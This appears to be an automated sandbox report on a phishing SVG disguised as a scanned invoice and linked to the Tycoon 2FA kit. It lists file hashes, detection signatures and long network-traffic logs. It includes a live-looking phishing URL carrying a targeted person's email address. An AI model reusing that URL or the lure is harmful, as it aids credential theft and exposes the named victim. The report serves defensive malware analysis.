Edit tour

Windows Analysis Report
Scanned Inv#118953-0012345.svg

Overview

General Information

Sample name:Scanned Inv#118953-0012345.svg
Analysis ID:1645347
MD5:1c3eec5466b41a5efe93ecb00f78b8ad
SHA1:34a5c7443d18ded539f65206109a26cff44f0f08
SHA256:f7c58f9d43a7ce1126d301001ea770e3dbee1fe1867f3cce0ee858c1ecf8599c
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:72
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\SCANNE~1.SVG MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,17268801680019511829,17547210441638238373,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2060 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_49JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    0.0.pages.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      0.0.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
        0.0.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
          0.1.pages.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            0.1.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_49, type: DROPPED
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: https://wtlo2.vtjgyhvuo.es/RGMO6oRV/#Msophie.meyer@ardian.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>EduVision - Transforming Education</title> <style> body { font-family: 'Segoe UI', Tahoma, Genev...
              Source: unknownHTTPS traffic detected: 172.67.206.88:443 -> 192.168.2.17:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.88:443 -> 192.168.2.17:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.206.88:443 -> 192.168.2.17:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.17:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.17:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.17:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.17:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49936 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 0MB later: 38MB
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.212
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: global trafficHTTP traffic detected: GET /RGMO6oRV/ HTTP/1.1Host: wtlo2.vtjgyhvuo.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://wtlo2.vtjgyhvuo.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://wtlo2.vtjgyhvuo.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://wtlo2.vtjgyhvuo.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=Xad76k1MvJa3z2fSOBydGr2JsWeH5RTRhmg1FfJaf4E-1742574847-1.0.1.1-EmCxztBOU58k83xt2QS5_x7AEbsmtgCBujShoN_QQ_cVWnKok5jDOSXxrF6WTX.cLbEKZEf5eB8Vakd2YtZ1BVdJ59gamE2ghOsskk1u_OY
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
